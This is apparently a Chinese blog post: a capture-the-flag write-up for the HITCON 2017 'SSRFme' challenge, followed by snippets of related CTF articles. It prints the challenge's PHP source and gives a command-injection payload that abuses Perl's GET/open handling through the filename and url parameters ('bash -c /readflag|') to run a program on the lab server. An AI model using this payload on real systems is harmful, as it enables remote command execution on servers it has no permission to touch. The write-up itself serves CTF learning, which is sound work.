一天一道ctf 第54天(GET open任意执行漏洞)

最新推荐文章于 2022-04-18 15:48:13 发布
最新推荐文章于 2022-04-18 15:48:13 发布
阅读量374 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/119740938
版权

[HITCON 2017]SSRFme

<?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);

前半段代码用orange和ip地址的md5编码在sandbox下新建了一个文件夹并且进入到该文件夹下。后来再用GET执行url的参数,这里的GET是Lib for WWW in Perl中的命令,有任意命令执行漏洞。再用filename新建文件夹,并且将GET命令执行的结果放入该文件夹。

ip地址已经显示在源码页面上了,再加上orange用MD5编码得到文件夹名sandbox/5bfd90feef2e64d9ecea7d17eed33d47
读取根目录文件然后将结果存放到文件夹a中,再直接访问

http://40b3989b-1e00-4b28-8ccb-ca5e02739a34.node4.buuoj.cn:81/?url=/&filename=a

http://40b3989b-1e00-4b28-8ccb-ca5e02739a34.node4.buuoj.cn/sandbox/5bfd90feef2e64d9ecea7d17eed33d47/a


可以看到有flag和readflag文件,应该是要执行readflag才能获取到flag。这里用的是open函数的任意代码执行漏洞,我们先新建一个文件?url=&filename=bash -c /readflag|
然后利用open的漏洞执行代码?url=file:bash -c /readflag|&filename=c
再访问http://40b3989b-1e00-4b28-8ccb-ca5e02739a34.node4.buuoj.cn:81/sandbox/5bfd90feef2e64d9ecea7d17eed33d47/c得到flag
在这里插入图片描述

scrawman
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ReadFlag:解决ctfs中的一些readflag情况
05-28
ReadFlag 现在某些 CTF 比赛越来越喜欢用一些/readflag程序去获取 flag ,然后需要在一定时间内计算一些数字,然而反弹的 shell 不能很好地处理这种问题,于是有了这个项目。 收集了一些应对这种形式的公开的脚本。如果你有什么优雅的解决方式也可以提交 pr :) 长期维护
CTF常用函数
sun的博客
05-04 863
我们在做ctf题时经常需要看一些浏览器的请求和反应头,但是我们经常不能很好的了解他们,因此我对接收我们浏览器的请求头有关的后端$_SERVER变量做了一个总结。 $_SERVER``[``'HTTP_ACCEPT_LANGUAGE'``];``//浏览器语言 $_SERVER``[``'REMOTE_ADDR'``]; //当前用户 IP 。 $_SERVER``[``'REMOTE_HOS...
BUUCTF平台-web-边刷边记录-2
weixin_30376453的博客
08-13 579
1.one line tool <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_fil...
CTFHub-技能树-Web-SSRF
MCTSOG的博客
04-18 932
CTFHub技能树-web-ssrf
[BUUCTF 2018]Online Tool
pakho_C的博客
02-21 862
web第36题 [BUUCTF 2018]Online Tool 打开靶场 php代码审计 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET[
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
ctf漏洞
02-22
ctf漏洞
一道CTF题学习PHP反序列化漏洞-附件资源
03-02
一道CTF题学习PHP反序列化漏洞-附件资源
逆向分析漏洞例子ctf
最新发布
10-19
逆向分析漏洞例子ctf
CTFSHOW 反序列化篇
羽的博客
12-11 1万+
web254 没搞懂和反序列化有啥关系,直接传username=xxxxxx&password=xxxxxx出flag web255 请求包内容如下 首先get传的username和password都是xxxxxx 因为源码里面 $user = unserialize($_COOKIE['user']); $user->login($username,$password); 就是是说我们需要让反序列后的结果是ctfShowUser的实例化对象。又因为只有$this->isVip是tr
CTF之PHP
Greedy Hat的博客
09-14 738
文章目录PHP超级全局变量$GLOBALS$_SERVER$_REQUEST$_POST$_GET$_FILESPHP内建函数PHP魔术常量_ LINE __ FILE __ DIR __ FUNCTION __ CLASS __ TRAIT ___ METHOD____ NAMESPACE__PHP表单和用户输入PHP表单处理PHP获取下拉菜单的数据PHP下拉菜单单选PHP下拉菜单多选单选按钮表...
实验吧WEB CTF 貌似有点难 全网最简单易懂的解题方法
滕青山博客
03-13 427
前言 题目网址:http://www.shiyanbar.com/ctf/32 需要用到的工具: burpsuite 理解 函数分析 代码中包含了两个部分,一个是得到IP地址的GetIP函数,一个是通过GetIP函数获得的IP验证是否为1.1.1.1的主函数部分。 那么这题的思路应该非常的清晰,我们需要想方法使得代码中的GetIP函数获得的IP地址为1.1.1.1,我们就能得到flag。 好,那么现在我们再来查看这个函数,在这个函数中我们可以这样去进行理解,首先查看是否存在$_SERVE.
CTF 中的 PHP 漏洞利用总结
热门推荐
重新启程
10-12 2万+
基础知识 系统变量(超全局变量) 在全部作用域中始终可用的内置变量 1 2 3 4 5 6 7 8 9 $GLOBALS // 引用全局作用域中可用的全部变量 $_POST // 获取 post 数据,是一个字典 $_GET // 获取 get 数据,是一个字典 $_COOKIE // 获取 cookie $_SESSION // 获取 session $...
[BUUCTF 2018]Online Tool CTF
wuyaowangchuan的博客
11-25 698
https://buuoj.cn/challenges#[BUUCTF%202018]Online%20Tool 进入环境 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } //获取客户端真实的IP地址 if(!isset($_GET['host'])) { highlight_file(__FILE.
ssrf漏洞 CTF
zb0567的专栏
04-21 1770
扫描 /index.php /robots.txt User-agent: * Disallow: /webshe11231231231.php http://*:8016/index.php?url=www.baidu.com http://*:8016/index.php?url=file:///etc/passwd 读取文件 http://*:8016/index.php?u...
[HITCON 2017]SSRFme ctf web buuctf
wuyaowangchuan的博客
11-12 490
<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_ADDR"]; $sandbox = "sandbox/..
ctf刷题记录
enhengzZ的博客
04-23 1283
基础认证题 页面中依据提示 可猜测用户为admin 可弱口令尝试(admin)------失败 暴脾气,,,词典爆破! 下载其页面提供的词典 抓包处对上图circle处进行解密 在burp的decode模板中进行查询可知其加密方式为base64 载入词典 此处开始走弯路:1.词典所加载的均为密码,缺少用户名(发现问题后,度娘学习正则表达式,很好,又学了个奇奇怪怪的姿势)2.词典爆破后一直都是401返回,长度均为404,没有出现200返回(原因未明) ----------------------------
download php ctf,FireShellCTF2019 Bad Injections解题记录
weixin_39630744的博客
04-03 365
这是整场比赛最简单的Web题…Web题质量很高,貌似现在还没有关环境主页面有四个功能,纯静态页面。右键about页面源码信息:给个本地web目录接着在list页面的源码里发现信息:因为页面显示图片,url没有其他参数,猜测应该是readfile之类的函数读的文件。File+hash的方法,既然是ctf,那hash应该不会加key。下载一个文件试一下能不能成功68.183.31.62:94/down...
文件上传漏洞 ctf
07-27
文件上传漏洞是指在网站或应用程序中,用户可以上传文件的功能存在安全漏洞,攻击者可以利用这个漏洞上传恶意文件,从而对系统进行攻击或控制。文件上传漏洞的测试流程可以按照以下步骤进行: 1. 首先,按照要求上传文件,并观察返回的结果,包括路径和提示信息。这可以帮助我们了解文件上传功能的限制和安全措施。 2. 接下来,尝试上传不同类型的恶意文件,如包含恶意代码的PHP文件。通过分析结果和查看HTML源码,我们可以判断是否存在前端的上传限制,以及是否可以绕过这些限制。 3. 在绕过上传限制方面,可以尝试使用黑白名单绕过、MIME类型绕过、目录0x00截断绕过等方法。这些方法可以结合其他漏洞,如敏感信息泄露漏洞,来获取木马文件的路径。 4. 最后,连接测试木马文件的路径,以验证文件上传漏洞的利用效果。 文件上传漏洞的产生原因通常是在用户上传文件时,后台没有对上传功能进行安全考虑,或者采用了有缺陷的安全措施。这使得攻击者可以通过各种手段绕过安全措施,上传恶意文件,从而控制整个Web后台系统。\[1\]\[3\] 请注意,文件上传漏洞是一种严重的安全威胁,开发人员应该在设计和实现文件上传功能时,采取适当的安全措施,如文件类型检查、文件大小限制、文件名过滤等,以防止此类漏洞的出现。 #### 引用[.reference_title] - *1* *2* *3* [【web-ctfctf-pikachu-fileupload](https://blog.csdn.net/Dajian1040556534/article/details/126451918)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值